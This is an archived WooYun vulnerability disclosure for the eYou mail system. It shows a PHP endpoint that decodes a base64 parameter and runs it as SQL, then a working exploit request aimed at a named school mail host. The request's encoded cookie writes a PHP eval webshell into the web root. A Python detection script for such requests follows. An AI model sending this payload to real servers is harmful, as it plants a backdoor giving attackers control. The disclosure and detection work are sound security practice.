WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
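2014-08-14: Details reported to the vendor; awaiting vendor handling
2014-08-14: Vendor confirmed; details disclosed to the vendor only
2014-08-17: Details opened to third-party security partners
2014-10-08: Details disclosed to core white hats and experts in related fields
2014-10-18: Details disclosed to regular white hats
2014-10-28: Details disclosed to trainee white hats
2014-11-12: Details disclosed to the public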
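eYou mail system: SQL execution leads to mass GetShell
Vulnerable file: \php\bill\print_addfeelog.php executes arbitrary SQL commands and is not affected by GPC (magic quotes), because the value arrives base64-encoded. By default MySQL has permission to export files, so a one-line backdoor can be exported.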
```php
<?
include("include/config.inc");
include("include/mysql_wrap.php");
include("include/utils.php");
include("include/message.php");
include("common/check_admin.php");

// Vulnerable: the request parameter is base64-decoded and used as the SQL statement as-is
$sql = base64_decode($_REQUEST['all_sql']);
$eyouSql = new eyousql();

// The decoded string is executed with no allow-list or parameter binding
$eyouSql->query($sql);
?>
```
Exploit code:
```http
POST /php/bill/print_addfeelog.php HTTP/1.1
Content-Length: 140
Host: mail.sihs.edu.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.2; zh-CN; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Forwarded-For: 127.0.0.1
Cookie: cookie=1; all_sql=c2VsZWN0ICc8P3BocCBldmFsKCRfUE9TVFsxXSk/PmMnIGludG8gb3V0ZmlsZSAnL3Zhci9leW91L2FwYWNoZS9odGRvY3MvcGhwL2JpbGwvc2NyaXB0L2luZGV4LnBocCc7
```
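A detection check for the flaw described above, as an added example that is not part of the original report or of eYou's code: it decodes `all_sql` the way the endpoint does (which is why quote-escaping filters such as GPC never see the SQL) and flags requests whose statement touches the filesystem. The function names, severity labels and sample requests (host `mail.example.test`) are constructed assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

ENDPOINT = "/php/bill/print_addfeelog.php"  # path named in the report
PARAM = "all_sql"                            # parameter named in the report
# SQL constructs that read or write files on the database host
FILE_IO = re.compile(r"\binto\s+(?:out|dump)file\b|\bload_file\s*\(|\bload\s+data\b", re.I)

def decode_sql(value):
    """Base64-decode leniently, as the endpoint does; None if not decodable."""
    value = value.replace(" ", "+")               # parse_qsl turned '+' into ' '
    value = re.sub(r"[^A-Za-z0-9+/]", "", value)  # drop padding and stray characters
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4))
    except ValueError:                            # binascii.Error subclasses ValueError
        return None
    return raw.decode("utf-8", "replace")

def param_values(raw_request):
    """Collect all_sql from query string, form body and Cookie ($_REQUEST may merge them)."""
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line, *headers = head.split("\r\n")
    parts = request_line.split(" ")
    if len(parts) < 2 or urlsplit(parts[1]).path.lower() != ENDPOINT:
        return []
    sources = [urlsplit(parts[1]).query, body]
    for header in headers:
        name, _, val = header.partition(":")
        if name.strip().lower() == "cookie":
            sources.append(val.replace(";", "&"))
    return [v for src in sources
            for k, v in parse_qsl(src, keep_blank_values=True) if k.strip() == PARAM]

def inspect_request(raw_request):
    """Return (severity, sql) per decodable value; severity labels are this example's own."""
    decoded = filter(None, map(decode_sql, param_values(raw_request)))
    return [("critical" if FILE_IO.search(sql) else "high", sql) for sql in decoded]

def _b64(text):
    return base64.b64encode(text.encode()).decode()
def _req(line, cookie="", body=""):  # builds constructed requests, not real traffic
    return f"{line} HTTP/1.1\r\nHost: mail.example.test\r\nCookie: {cookie}\r\n\r\n{body}"

WRITE = "select 1 into outfile '/tmp/constructed.txt'"  # constructed sample statement
SAMPLES = [
    _req("POST " + ENDPOINT, body="all_sql=" + _b64(WRITE)),
    _req("GET " + ENDPOINT, cookie="cookie=1; all_sql=" + _b64("select version()")),
    _req("GET /php/index.php?all_sql=" + _b64(WRITE))]
```

Any decodable `all_sql` sent to this path is reported, because the endpoint runs whatever statement it receives; file I/O is only what raises the severity.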
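Please fix it yourselves.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-08-14 09:46
After comparison, this is the same vulnerability as http:///bugs/wooyun-2010-. It is not a first report, and the software vendor is already aware of it. For the issue in the old versions described, CNVD has all along been supervising the software vendor's response to its users.
None yet.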